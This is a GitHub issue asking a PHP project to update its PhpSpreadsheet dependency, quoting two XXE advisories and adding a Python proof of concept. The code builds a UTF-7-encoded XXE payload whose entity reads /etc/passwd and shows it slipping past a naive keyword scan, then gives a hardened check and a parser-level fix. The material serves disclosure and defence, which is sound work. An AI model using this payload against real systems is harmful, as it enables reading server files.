Could you please update your composer.json file? #41

Open
gammaire opened this issue Jan 23, 2020 · 0 comments

Comments

@gammaire

The dependency requirement is not updated and contains a potential vulnerability, as per below. Please update the dependency to: "phpoffice/phpspreadsheet": "1.8.0"
Thanks.

CVE-2019-12331
moderate severity
Vulnerable versions: < 1.8.0
Patched version: 1.8.0
PHPOffice PhpSpreadsheet before 1.8.0 has an XXE issue. The XmlScanner decodes the sheet1.xml from an .xlsx to utf-8 if something else than UTF-8 is declared in the header. This was a security measurement to prevent CVE-2018-19277 but the fix is not sufficient. By double-encoding the xml payload to utf-7 it is possible to bypass the check for the string "<!ENTITY" and thus allow an xml external entity processing (XXE) attack.

CVE-2018-19277
high severity
Vulnerable versions: < 1.5.0
Patched version: 1.5.0
securityScan() in PHPOffice PhpSpreadsheet through 1.5.0 allows a bypass of protection mechanisms for XXE via UTF-7 encoding in a .xlsx file
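The bypass pattern both advisories describe, as an added stand-alone example that is not part of the issue and not PhpSpreadsheet's XmlScanner (it is Python rather than PHP so it runs as-is). The sheet XML, the entity declaration, and the two scanner functions are all constructed for the illustration. Python's own utf-7 encoder never shifts ASCII such as `<` and `!`, so the attacker-side shift sequence is built by hand; RFC 2152 allows any character to be written in `+...-` form and every conforming decoder has to accept it.

```python
import base64
import codecs
import re

# Constructed sample input (not taken from the issue): the DOCTYPE a sheet1.xml
# would carry to declare an external entity, and a minimal cell referencing it.
XXE_DOCTYPE = '<!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
SHEET_BODY = (
    '<worksheet><sheetData><row><c t="inlineStr"><is><t>&xxe;</t></is></c>'
    "</row></sheetData></worksheet>"
)


def plain_payload() -> bytes:
    """XXE document with no encoding trick: UTF-8 declared, DOCTYPE in clear."""
    return ('<?xml version="1.0" encoding="UTF-8"?>\n'
            + XXE_DOCTYPE + "\n" + SHEET_BODY).encode("utf-8")


def utf7_shift(text: str) -> str:
    """Write text entirely as one RFC 2152 '+...-' shift sequence.

    Python's utf-7 encoder leaves '<' and '!' as direct characters, so the
    attacker builds the sequence by hand: modified base64 of the UTF-16BE
    form, padding stripped. Any decoder that honours UTF-7 must accept it.
    """
    b64 = base64.b64encode(text.encode("utf-16-be")).decode("ascii")
    return "+" + b64.rstrip("=") + "-"


def utf7_payload() -> bytes:
    """Same document with UTF-7 declared and the DOCTYPE in shifted form."""
    return ('<?xml version="1.0" encoding="UTF-7"?>\n'
            + utf7_shift(XXE_DOCTYPE) + "\n" + SHEET_BODY).encode("ascii")


def benign_payload() -> bytes:
    """A sheet with no DTD at all, which a scanner must keep accepting."""
    return ('<?xml version="1.0" encoding="UTF-8"?>\n'
            + SHEET_BODY.replace("&xxe;", "hello")).encode("utf-8")


def naive_scan_rejects(raw: bytes) -> bool:
    """Substring check on the raw bytes, before any decoding.

    This is the shape of check the advisory says UTF-7 slips past; it is a
    stand-in written for this example, not the library's own code.
    """
    return b"<!ENTITY" in raw


def declared_encoding(raw: bytes) -> str:
    """Encoding named in the XML declaration, defaulting to UTF-8 as XML does."""
    m = re.match(rb'<\?xml[^>]*?encoding=["\']([A-Za-z0-9._-]+)["\']', raw)
    return m.group(1).decode("ascii") if m else "UTF-8"


def decode_as_parser_would(raw: bytes) -> str:
    """Decode the bytes the way an XML parser honouring the declaration will.

    Unknown encodings are refused rather than guessed (fail closed).
    """
    enc = declared_encoding(raw)
    try:
        codecs.lookup(enc)
    except LookupError:
        raise ValueError(f"refusing unknown encoding {enc!r}") from None
    return raw.decode(enc)


def hardened_scan_rejects(raw: bytes) -> bool:
    """Run the check on the decoded text, and refuse any DTD, not just ENTITY.

    A spreadsheet part never needs a DOCTYPE, so rejecting the whole DTD
    leaves no entity syntax for an encoding trick to hide behind.
    """
    text = decode_as_parser_would(raw)
    return re.search(r"<!(?:DOCTYPE|ENTITY)\b", text) is not None


if __name__ == "__main__":
    for name, raw in (("plain", plain_payload()), ("utf-7", utf7_payload())):
        print(f"{name:6} naive={naive_scan_rejects(raw)} "
              f"hardened={hardened_scan_rejects(raw)}")
```

Running it shows the raw-byte check passing the UTF-7 document while the decoded check rejects it. Even the decoded check is still a denylist over text, so it only holds as long as the decoding step matches what the real parser does with the declared encoding; the durable fix is to have the XML parser refuse DTDs and external entities outright (in PHP, never passing LIBXML_NOENT and, on PHP versions before 8.0, calling libxml_disable_entity_loader(true)), which does not depend on which encoding the attacker chooses.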
